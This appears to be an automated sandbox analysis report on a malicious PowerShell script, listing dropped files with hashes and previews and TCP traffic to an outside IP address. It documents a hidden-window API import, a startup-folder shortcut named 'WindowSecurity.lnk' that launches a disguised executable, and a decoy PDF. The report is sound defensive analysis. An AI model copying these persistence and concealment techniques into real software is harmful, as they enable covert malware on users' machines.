                                                                                                                                                                                                  SHA-512:3EDE798B75A6FE6FDD017E5514EE6193409CC27B1B6C42BE46E8D74FA5C4B97F55B90927AE66C4266BCF2F7C115310D0E01E1BA2E2CD595CD363556200E1D80D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:PK........../Y................DLLs/PK.........u.V.J\*......".....DLLs/libcrypto-1_1.dll..XTI... *......b.9'...1.9.,.4.(.b.c..s.q..s.s...9+.{..0.s.s....<6.wU.Z..j.JU.l4..`08._l....`{*......e..fX..h.M..G3....W.^...j..u.n..y.j..O7.........M...%....ql../..............IA..Y.......g.w.}.._<...].7M....V~.G.....}tg..~....[w.~<.>...CbCh.;..]78fvqp.b..a0,Hj...^?&..a..H;....._..LY.D,.>..+8X+.....m.Z8f2...h..&...._...'...c..<.P8...E.!.vFC..`.~.......l.......j.?H._f..!D_../.%4..j.2....7w.[...o^.o..n...b..?.Gf.!..6...r;.w..\.a..N..e.'...[.......VZ..~P.W.^...vY4P.3.G..v..om45....(W....s.'..YwCL.T......1.N(5/Z.fKm....f.i}).!fU1}.<7.!.{.R....b:.u4.$,...cH....z.W[.Nl1.b..W....^K...SF.p......l............s.F.>j.'....Z.{.H....|..z.v...J.Tc..~r.WF./.Z....[...J.\..*r...]o.o.~...=.x.....Bcc.'CL.".B.....M..2H?....b.LW..zu....3.@.C.y.GK..+.0}.......w....oG...7...[...)..x.o.r.......>...\....tU............{Z.vm........UKyY5.N.B%.*5..0.1[.:1F.2...e.Z.T.;.671..$6.L{

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\o3u40tef\CSCF365B556FF7845F2AC7AB259D83AC6F.TMP

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):652
                                                                                                                                                                                                  Entropy (8bit):3.0838687313505666
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryLNyak7YnqqANTPN5Dlq5J:+RI+ycuZhNxNyakSANTPNnqX
                                                                                                                                                                                                  MD5:05BB9AAEC00E46CEACDB7C43427ECBB8
                                                                                                                                                                                                  SHA1:DC9A05EDD6C77E66FC2BA668D62D509AC6D59A4D
                                                                                                                                                                                                  SHA-256:F4C2319810BBDE1C5E0E51EC87853546C57564156E39E662AB295EDCB643EC2F
                                                                                                                                                                                                  SHA-512:FA41C788F2485D2AF0924631693F747AE4A06EC88DE7027FCD3CBC95BBE3C63974F9200E0034FD54E973A4E99295E533262ABFFBA89F4491523E4DBC47CD55F2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.3.u.4.0.t.e.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.3.u.4.0.t.e.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.0.cs

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):237
                                                                                                                                                                                                  Entropy (8bit):4.930339528566556
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:V/DsYLDS81zuU0qdSVdNVM/so68SRkoSVNqYDJQy:V/DTLDfuUP/RE9izJQy
                                                                                                                                                                                                  MD5:A6E80541A483188DBCE2F3D843FCBE4D
                                                                                                                                                                                                  SHA1:A1F2E13A3314AB6A676751936C7B3B9A9FB9103E
                                                                                                                                                                                                  SHA-256:D5B10C7F3CBB62CBF4772A7B178C578C8ABAA3FE9A7420DECBFF18D81F08CCD9
                                                                                                                                                                                                  SHA-512:6F60F86688DC256A668B6E3E8529820CF8253C47C6A1126F3097576F36B5C220F32FEBABCE65E25DFA5B824DC2200B7CA7ACA2C3BC3B8314CADB734A589B6337
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace Win32Functions.{. public class Win32ShowWindowAsync. {. [DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);.. }..}.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.cmdline

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):371
                                                                                                                                                                                                  Entropy (8bit):5.176439777209131
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fB8G0zxs7+AEszI923fB8kn:p37Lvkmb6KzJh0WZE2J7
                                                                                                                                                                                                  MD5:ABEA96231206A78EEBC482ADF4AE15B2
                                                                                                                                                                                                  SHA1:8E1214466784C176B0E70307FE7A6827CBB1D321
                                                                                                                                                                                                  SHA-256:4481FA89E04291975643B0DA23055521491B615A493C9B56A30A3164DDC0E9B2
                                                                                                                                                                                                  SHA-512:E8F5FEDEE99C25C2BACFA58DA2A5CE1F4C1C949A9D8DC45A6ADB6ED18FEFDDA0C68A6964AA629F57B763FAA1A1F3955258E5FF67BEF3BE04375250734444CC83
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.0.cs"

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3072
                                                                                                                                                                                                  Entropy (8bit):2.7908963696395865
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:etGSceJ+JV+83Ct6GyrytkZfKa1FeuWI+ycuZhNxNyakSANTPNnqI:6MF3W6P1JKCeV1ulx8a3AjqI
                                                                                                                                                                                                  MD5:F3261443093AE042A45C8CE6304B0F6F
                                                                                                                                                                                                  SHA1:77BFB37A1508517B410AE64F132308EFBD076066
                                                                                                                                                                                                  SHA-256:01A9AB3DB9A94890AC350941D7496A917BD36F5E95CE694EEFF7A9115C877EDC
                                                                                                                                                                                                  SHA-512:5CC3D8ACF334E2BC2708E16A25141DE2C167DA83680F3AB425E847FBDEE195ED95A6649F0E88D3294406E5F1DF097B2C5F4BD43273591ADCF5CE711DD31AE4DC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....7g...........!.................#... ...@....... ....................................@.................................D#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..p.......#Strings............#US.........#GUID.......H...#Blob...........G.........%3............................................................K.D.....v.....v...........................,.............. R.....P ......b.........h.....m...b.....b...!.b.....b.............'.......R.......................................;........<Module>.o3u40tef.dll.Win32Show

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.out

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):872
                                                                                                                                                                                                  Entropy (8bit):5.285135210809292
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:KMoId3ka6KzJ3E2J6Kax5DqBVKVrdFAMBJTH:dokka6ahE2YK2DcVKdBJj
                                                                                                                                                                                                  MD5:7F66ED34000A3AEA76395117D0E43519
                                                                                                                                                                                                  SHA1:A9A5DD55863AA8672CFA4BB0AB96E4B0050195A4
                                                                                                                                                                                                  SHA-256:90A2D739682B99000C4332E17A1CC3C1FBB8D043F7690AEB2A5718CBCCD32518
                                                                                                                                                                                                  SHA-512:B906C94C300695C27296BCDB4DB64784A8EF7B1870A848B42F6B581CC6C3E5F9A0099296574C153C113674D3FBDAE783EE69415ECBB53B015C4DF1AB6A5789CB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0TSC9U5X0FZF6UISVBWK.temp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6222
                                                                                                                                                                                                  Entropy (8bit):3.6870410342785807
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:riTSanCQZbU2K+xHukvhkvklCyw6n29C1szGlzBSogZoNdC1szGl4JBSogZo51:OfnC/ockvhkvCCtnCyyKHYCyy2qHW
                                                                                                                                                                                                  MD5:94431F4CD017903135D78441BB378D38
                                                                                                                                                                                                  SHA1:9D99C59E27160CE019C008246D58CB94A8B9E9E5
                                                                                                                                                                                                  SHA-256:96FC7859CFA79F3D2B112DC138189DBD48C3662917503268329D13407B483779
                                                                                                                                                                                                  SHA-512:812367336779609DDA32D7476E7D0EE0C231A332CB2CFAC09C091A3D180DC5299A4B1F048ADA370131262FB7E42BD57C7C0555831A7C8A552D23436F00F4E7EA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:...................................FL..................F.".. ...d.......<+`47..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....D.'\47....4`47......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSloYy?....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....oY}?..Roaming.@......DWSloY}?....C......................X..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSloYy?....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSloYy?....E......................uG.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSloYy?....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSloYy?....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSloY.@....q...........

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6222
                                                                                                                                                                                                  Entropy (8bit):3.6870410342785807
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:riTSanCQZbU2K+xHukvhkvklCyw6n29C1szGlzBSogZoNdC1szGl4JBSogZo51:OfnC/ockvhkvCCtnCyyKHYCyy2qHW
                                                                                                                                                                                                  MD5:94431F4CD017903135D78441BB378D38
                                                                                                                                                                                                  SHA1:9D99C59E27160CE019C008246D58CB94A8B9E9E5
                                                                                                                                                                                                  SHA-256:96FC7859CFA79F3D2B112DC138189DBD48C3662917503268329D13407B483779
                                                                                                                                                                                                  SHA-512:812367336779609DDA32D7476E7D0EE0C231A332CB2CFAC09C091A3D180DC5299A4B1F048ADA370131262FB7E42BD57C7C0555831A7C8A552D23436F00F4E7EA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:...................................FL..................F.".. ...d.......<+`47..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....D.'\47....4`47......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSloYy?....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....oY}?..Roaming.@......DWSloY}?....C......................X..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSloYy?....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSloYy?....E......................uG.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSloYy?....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSloYy?....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSloY.@....q...........

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecurity.lnk

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Fri Nov 15 07:00:32 2024, mtime=Fri Nov 15 07:00:32 2024, atime=Wed Apr 5 17:47:42 2023, length=100120, window=hidenormalshowminimized
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2162
                                                                                                                                                                                                  Entropy (8bit):3.744293030028992
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:8WC+fjlf8cXcRYqsHDTtAyH+49/4cP9JwddNXuHYOPdPqygm:8W/LOXRqHDTmkpt42cdLXuHyyg
                                                                                                                                                                                                  MD5:2E88AD65F873C5E33B71C51F46BF6415
                                                                                                                                                                                                  SHA1:F6C3006C11F915F8C0A3BD5384AFDCBFC0134BED
                                                                                                                                                                                                  SHA-256:DCE0A1CE7A606DFDD80B1255C81461F3C6DC981BB4F7AA28BB4526DA7B164B91
                                                                                                                                                                                                  SHA-512:880BE10FEEDCF5A39748971FB07C22C02517CA409342BD9776C37B05CFA6A9C85F3B0E3869F03C0F2DD6FE4629F4D97E804C9132870CEA4CB07C80E667C1BFCD
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:L..................F.@.. ...$H.q47..$H.q47...[I..g............................:..DG..Yr?.D..U..k0.&...&...... M......C.s47..n..s47......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSloY.@....B.....................Bdg.A.p.p.D.a.t.a...B.P.1.....oY.@..Local.<......DWSloY.@....V.....................Q.).L.o.c.a.l.....l.1.....oY.@..CHROME~1..T......oY.@oY.@............................#.C.h.r.o.m.e.A.p.p.l.i.c.a.t.i.o.n.....h.2......V.. .SYNAPT~1.EXE..L......oY.@oY.@.....M........................s.y.n.a.p.t.i.c.s...e.x.e.......l...............-.......k...........e.......C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.C.h.r.o.m.e.A.p.p.l.i.c.a.t.i.o.n.\.s.y.n.a.p.t.i.c.s...e.x.e.:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.C.h.r.o.m.e.A.p.p.l.i.c.a.t.i.o.n.\.r.u.n.t.i.m.e...p.y.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.

                                                                                                                                                                                                  C:\Users\user\Document.pdf

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PDF document, version 1.3, 3 pages
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3986
                                                                                                                                                                                                  Entropy (8bit):7.456004459274474
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:6RHrsQ6Fc+YDxP8gpOwEBdOujxeB7knVQzWKB5Y+74C0sLJRSo:6trcPYDigiBdfetAMxm8BPRSo
                                                                                                                                                                                                  MD5:F1D1BF7BA473B16F95B0BAFE0E09A402
                                                                                                                                                                                                  SHA1:33CBC0601595EC233C96D8181D12CEAE9CEECE7A
                                                                                                                                                                                                  SHA-256:CFBACCD2CC5E9FCE35F05E87D7F5D8DF85CA47ECF0E8FDC44CFB701A70EB0DFE
                                                                                                                                                                                                  SHA-512:559918229442151AF1C1C48D55052BC94BB28E664CE5190B40BF0CE10A3381F1D9773F3FC4E1848CB7A5E34DE4279533E64F667F58F473DB61C824E861CF6F90
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:%PDF-1.3.3 0 obj.<</Type /Page./Parent 1 0 R./Resources 2 0 R./Contents 4 0 R>>.endobj.4 0 obj.<</Filter /FlateDecode /Length 879>>.stream.x.}TM..:...+..U...?...P..+.(H...bO....$%..{f.8N..'.F...3...*.e..W..x.1...I...|X.4iD.B.".a.../f@0+....{.^9...(.Tk....k..4Hx4.U........3H..#.U.."..H...V$.k....HO ]... .....X.J<.......{...^&V.5|..:....z:....j2.7. .n.....=QA......ai..<H....|...#?.]............H...W%Y..{.k....CY)Xg>$....v.b.+c.o....),.6.E........>..>.Rk..~..n.I...].k........V...G.d...B..v.Ri......Or.....E*)sylC.....${.v.\ .*.**.\...#..a&pP~.Q.G92..WJ#t.Pf.....,.]..n..)../.a0...<.$...a..|&...O.Y-....N.=..R..3M.&D..a...j....>!..ZJ..G.c...yc..x.....7w......d.E.....j....|.E&.X.Q.,J>..)......7.%Z...9u....K7...\u.#FA..l.......C.@...N..^.e]dM).8}...|.cV...3....>..V....ufq....r..w-....,HU]..e.h.. .4.....8j....c.....?..L.t.c.f..i..$.{..I".vRc..[..\.............v..]..^.<MKQL..+......4...v...I\..6 ..H.........t...............^n.!O.\..>.o./.QW'....~.

                                                                                                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  File type:ASCII text, with very long lines (411), with CRLF line terminators
                                                                                                                                                                                                  Entropy (8bit):5.421366818159908
                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                    File name:protected.ps1
                                                                                                                                                                                                    File size:2'394 bytes
                                                                                                                                                                                                    MD5:1acc58a5906a2bbb99c52afa5d29a46c
                                                                                                                                                                                                    SHA1:eaff5f5949f015597f2a558dcc0bd86788464591
                                                                                                                                                                                                    SHA256:0da85c4b554215f0a8ca81af0aea01fb7d197bd6da81b64a07e1ccc0d2e384ff
                                                                                                                                                                                                    SHA512:92561a1c04202135b9489b37704b5dffa466e00ade6427562fd24ed61f93db7ff1e146142a82a373ba8c2eccae0baa1991cf4c8f1b77948119ecc8ad4caffd9e
                                                                                                                                                                                                    SSDEEP:48:3EXTA5PYuWBP+R0DMOFkPEMzpfWbkp6uE/S/3zWCLArx2lxzZ9XfES:yTA5hWBJDNkckpQkgR6faZl0dZ9z
                                                                                                                                                                                                    TLSH:0B411063B272D0F552727BB2AA96DE20EC56402E1186A925320C4681FF3447FD797FCE
                                                                                                                                                                                                    File Content Preview:function HC() {.. $ShowWindowAsyncCode = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);'.. $ShowWindowAsync = Add-Type -MemberDefinition $ShowWindowAsyncCode -name Win32ShowWindowAsync -namespace Win

                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                    Icon Hash:3270d6baae77db44

                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Nov 15, 2024 09:00:07.563503981 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:07.563600063 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:07.563749075 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:07.582659006 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:07.582741976 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:08.657304049 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:08.657542944 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:08.661458969 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:08.661514044 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:08.661895037 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:08.672540903 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:08.715336084 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.025651932 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.077405930 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.077470064 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.124257088 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.255160093 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.255172968 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.255285978 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.255367041 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.255392075 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.255430937 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.255472898 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.255506992 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.255538940 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.296128988 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.370536089 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.370562077 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.370718002 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.370733023 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.370783091 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.370836020 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.370872974 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.370872974 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.370899916 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.487025976 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.487088919 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.487139940 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.487195969 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.487215996 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.487246037 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.604350090 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.604445934 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.604576111 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.604646921 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.604685068 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.604733944 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.721275091 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.721338034 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.721398115 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.721468925 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.721503019 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.721525908 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.838448048 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.838470936 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.838679075 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:09.838743925 CET44349704202.92.4.57192.168.2.5
